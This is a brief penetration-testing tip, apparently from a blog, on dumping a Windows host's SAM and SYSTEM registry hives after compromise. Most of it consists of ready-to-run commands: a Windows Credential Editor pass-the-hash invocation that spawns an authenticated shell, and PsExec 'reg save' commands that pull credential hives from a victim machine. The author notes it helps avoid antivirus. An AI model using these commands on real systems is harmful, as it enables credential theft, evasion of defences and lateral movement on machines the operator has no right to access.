wce

1.  This command came in very handy on a recent pentest. Essentially this allows us to dump out the SAM and SYSTEM files on a compromised host, whilst also helping avoid A/V. It should be noted that this is a post exploitation task and assumes you have SYSTEM access to the host/or are using a privileged hash to authenticate from a remote system.
2.  
3. If you wish to perform this attack remotely you’ll need the relevant hash and wce to perform the following command:
4.  
5. wce.exe -s administrator:500:LMHASH:NTHASH -c cmd.exe
6.  
7. Then in the spawned window you can use the following:
8.  
9. PsExec.exe \\%VICTIM_IP% reg save hklm\system %LOCATION% & PsExec.exe \\%VICTIM_IP% reg save hklm\sam %LOCATION%
10.  
11. If you have local access you can obviously drop the wce and psexec sections.